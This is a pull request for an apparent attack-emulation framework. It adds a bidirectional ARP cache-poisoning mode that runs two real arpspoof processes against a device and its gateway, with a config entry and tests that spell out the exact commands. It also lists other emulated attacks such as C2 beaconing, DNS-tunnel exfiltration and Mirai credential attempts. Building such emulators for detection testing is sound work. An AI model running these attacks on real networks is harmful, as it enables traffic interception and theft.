### PR TITLE
feat: bidirectional ARP spoofing MITM attack

### DIFF
--- a/README.md
+++ b/README.md
@@ -172,7 +172,7 @@ Each attack is defined by a `kind` field and mapped to an executor:
 * `c2_dns_beacon` sends a single jittered real DNS query per invocation as a C2 check-in beacon over UDP/53, distinct wire shape from `c2_beacon`; configurable via `port`, `domain`, and `jitter_seconds`
 * `exfil_sim` sends a bulk outbound POST burst simulating data-staging/exfil traffic; configurable via `payload_size_bytes` and `chunk_size_bytes`
 * `config_tamper` sends a real config/firmware-tampering-shaped HTTP request (`path`, `method`, `body`, optional `content_type`/`soap_action` for SOAP-based exploits) and reports the response status; defaults to `enabled: false` at the model level - each entry needs per-device safety vetting before it's turned on, since a payload that succeeds could brick real hardware
-* `arp_spoof` runs real `arpspoof` against a device for a bounded `duration_seconds`, poisoning its ARP relationship with `gateway_ip` on `interface` (classic on-path MITM)
+* `arp_spoof` runs real `arpspoof` against a device for a bounded `duration_seconds`, poisoning its ARP relationship with `gateway_ip` on `interface` (classic on-path MITM); set `bidirectional: true` to also poison the gateway's cache entry for the device, redirecting return traffic too
 * `dns_tunnel_exfil` encodes a staged payload as base32 subdomain labels sent via periodic real DNS queries, simulating DNS-tunneling exfiltration; configurable via `payload_size_bytes`, `chunk_size_bytes`, and `base_domain`
 * `placeholder` is a disabled stub for attacks not yet implemented (cannot be `enabled: true`)
 * additional attack types can be added via the registry

--- a/configs/attacks.yaml
+++ b/configs/attacks.yaml
@@ -238,6 +238,21 @@ attacks:
     gateway_ip: 192.168.1.1
     duration_seconds: 30
 
+  # ARP Spoofing #2 (#96) - bidirectional (full) MITM. Poisons both the
+  # device's cache (as above) and the gateway's cache entry for the
+  # device, so return traffic is redirected too - real dsniff-based MITM
+  # setups need both directions; single-direction alone often doesn't
+  # achieve a working intercept.
+  - name: arp_spoof_bidirectional_mitm
+    label: ARP_Spoof_Bidirectional_MITM
+    kind: arp_spoof
+    enabled: true
+    repeats: 2
+    interface: eth0
+    gateway_ip: 192.168.1.1
+    duration_seconds: 30
+    bidirectional: true
+
   # Credential Access #2 (#91) - real entries from Mirai's published
   # default-credential table (all root:X pairs below are literal entries
   # from that table, not a synthesized cartesian product).

--- a/src/capex/attacks/arp.py
+++ b/src/capex/attacks/arp.py
@@ -21,7 +21,11 @@ class ArpSpoofExecutor:
 
     Poisons the device's ARP cache for its relationship with gateway_ip
     (classic on-path MITM), mirroring TcpdumpCapture's popen/terminate/kill
-    start-stop pattern since arpspoof itself runs until killed.
+    start-stop pattern since arpspoof itself runs until killed. When
+    bidirectional is set, also runs a second arpspoof poisoning the
+    gateway's cache entry for the device, so return traffic is redirected
+    too - real dsniff-based MITM setups need both directions to actually
+    intercept traffic; single-direction poisoning alone often doesn't.
     """
 
     def __init__(self, *, runner: CommandRunner, attack: ArpSpoofAttackConfig) -> None:
@@ -29,13 +33,35 @@ class ArpSpoofExecutor:
         self._attack = attack
 
     def execute(self, *, device: DeviceConfig) -> str | None:
+        host = str(device.ip)
+        processes = [self._start(target_ip=host, impersonate_ip=self._attack.gateway_ip)]
+
+        try:
+            if self._attack.bidirectional:
+                processes.append(self._start(target_ip=self._attack.gateway_ip, impersonate_ip=host))
+        except AttackExecutionError:
+            for process in processes:
+                self._stop(process)
+            raise
+
+        time.sleep(self._attack.duration_seconds)
+
+        for process in processes:
+            self._stop(process)
+
+        detail = f'duration_seconds={self._attack.duration_seconds}'
+        if self._attack.bidirectional:
+            detail += ', bidirectional=true'
+        return detail
+
+    def _start(self, *, target_ip: str, impersonate_ip: str) -> subprocess.Popen[str]:
         process = self._runner.popen([
             self._attack.arpspoof_binary,
             '-i',
             self._attack.interface,
             '-t',
-            str(device.ip),
-            self._attack.gateway_ip,
+            target_ip,
+            impersonate_ip,
         ])
 
         time.sleep(_START_CHECK_DELAY_SECONDS)
@@ -45,13 +71,12 @@ class ArpSpoofExecutor:
             msg = f'{self._attack.arpspoof_binary} exited immediately with code {process.returncode}: {stderr.strip()}'
             raise AttackExecutionError(msg)
 
-        time.sleep(self._attack.duration_seconds)
+        return process
 
+    def _stop(self, process: subprocess.Popen[str]) -> None:
         process.terminate()
         try:
             process.wait(timeout=_STOP_TIMEOUT_SECONDS)
         except subprocess.TimeoutExpired:
             process.kill()
             process.wait(timeout=_KILL_TIMEOUT_SECONDS)
-
-        return f'duration_seconds={self._attack.duration_seconds}'

--- a/src/capex/models.py
+++ b/src/capex/models.py
@@ -174,6 +174,7 @@ class ArpSpoofAttackConfig(BaseModel):
     gateway_ip: str = Field(min_length=1)
     duration_seconds: PositiveInt = 30
     arpspoof_binary: str = 'arpspoof'
+    bidirectional: bool = False
 
 
 class DnsTunnelExfilAttackConfig(BaseModel):

--- a/tests/test_arp.py
+++ b/tests/test_arp.py
@@ -41,13 +41,16 @@ class _FakeProcess:
 
 
 class _FakeRunner:
-    def __init__(self, process: _FakeProcess) -> None:
-        self._process = process
+    def __init__(self, process: _FakeProcess | list[_FakeProcess]) -> None:
+        self._processes = process if isinstance(process, list) else [process]
         self.popen_args: list[str] | None = None
+        self.popen_calls: list[list[str]] = []
 
     def popen(self, args, *, cwd=None):
         self.popen_args = list(args)
-        return self._process
+        self.popen_calls.append(list(args))
+        index = len(self.popen_calls) - 1
+        return self._processes[index] if index < len(self._processes) else self._processes[-1]
 
 
 def test_arp_spoof_executor_runs_for_duration_then_terminates(monkeypatch) -> None:
@@ -100,3 +103,53 @@ def test_arp_spoof_executor_kills_process_that_does_not_terminate_in_time(monkey
 
     assert process.terminate_called is True
     assert process.kill_called is True
+
+
+def test_arp_spoof_executor_bidirectional_starts_both_directions(monkeypatch) -> None:
+    victim_process = _FakeProcess(exited=False)
+    gateway_process = _FakeProcess(exited=False)
+    runner = _FakeRunner([victim_process, gateway_process])
+    monkeypatch.setattr(arp.time, 'sleep', lambda seconds: None)
+
+    device = DeviceConfig(name='dev1', ip='192.168.1.50')
+    attack = ArpSpoofAttackConfig(
+        name='arp_spoof',
+        label='ARP_Spoof',
+        interface='eth0',
+        gateway_ip='192.168.1.1',
+        duration_seconds=30,
+        bidirectional=True,
+    )
+    executor = arp.ArpSpoofExecutor(runner=runner, attack=attack)
+
+    detail = executor.execute(device=device)
+
+    assert runner.popen_calls == [
+        ['arpspoof', '-i', 'eth0', '-t', '192.168.1.50', '192.168.1.1'],
+        ['arpspoof', '-i', 'eth0', '-t', '192.168.1.1', '192.168.1.50'],
+    ]
+    assert victim_process.terminate_called is True
+    assert gateway_process.terminate_called is True
+    assert detail == 'duration_seconds=30, bidirectional=true'
+
+
+def test_arp_spoof_executor_bidirectional_raises_if_gateway_direction_exits_immediately(monkeypatch) -> None:
+    victim_process = _FakeProcess(exited=False)
+    gateway_process = _FakeProcess(exited=True, returncode=1, stderr='arpspoof: eth9: No such device exists')
+    runner = _FakeRunner([victim_process, gateway_process])
+    monkeypatch.setattr(arp.time, 'sleep', lambda seconds: None)
+
+    device = DeviceConfig(name='dev1', ip='192.168.1.50')
+    attack = ArpSpoofAttackConfig(
+        name='arp_spoof',
+        label='ARP_Spoof',
+        interface='eth9',
+        gateway_ip='192.168.1.1',
+        bidirectional=True,
+    )
+    executor = arp.ArpSpoofExecutor(runner=runner, attack=attack)
+
+    with pytest.raises(AttackExecutionError, match='No such device exists'):
+        executor.execute(device=device)
+
+    assert victim_process.terminate_called is True

--- a/tests/test_models.py
+++ b/tests/test_models.py
@@ -87,6 +87,7 @@ def test_arp_spoof_attack_config_defaults() -> None:
     attack = ArpSpoofAttackConfig(name='arp_spoof', label='ARP_Spoof', interface='eth0', gateway_ip='192.168.1.1')
     assert attack.duration_seconds == 30
     assert attack.arpspoof_binary == 'arpspoof'
+    assert attack.bidirectional is False
 
 
 def test_dns_tunnel_exfil_attack_config_defaults() -> None:


### PR DESCRIPTION
Second ARP Spoofing example per #66's >= 2-examples-per-category bar. Resolves #96.

## Summary
- Extends `ArpSpoofAttackConfig`/`ArpSpoofExecutor` (from #82) with a `bidirectional` flag (default `False`, backward compatible — #82's existing entry unaffected).
- When `bidirectional: true`, runs a **second** real `arpspoof` process poisoning the gateway's cache entry for the device (in addition to the existing device-side poisoning from #82), so return traffic is redirected too.
- Real dsniff-based MITM setups need both directions — single-direction poisoning alone often doesn't achieve a working intercept. This completes #82's half-MITM into the technically correct full version, not a novel technique.
- If the second direction fails to start (e.g. bad interface), the first is cleanly stopped before raising, rather than left running.
- New `arp_spoof_bidirectional_mitm` entry in `attacks.yaml`.

MITRE: T1557.002 ARP Cache Poisoning.

## Test plan
- [x] `uv run pytest` — full suite green
- [x] `uv run pytest --cov=capex` — `arp.py` and `registry.py` both 100%
- [x] `uv run ruff format . && uv run ruff check .` — clean
- [x] `uv run capex --dry-run` — confirms `configs/attacks.yaml` loads/validates with the new entry
- [x] New tests cover: both directions started with correct `-t`/impersonate args, both processes terminated, and cleanup-on-partial-failure (first process stopped if the second fails to start)

I'll merge this manually; will close #96 with a comment linking the merge afterward.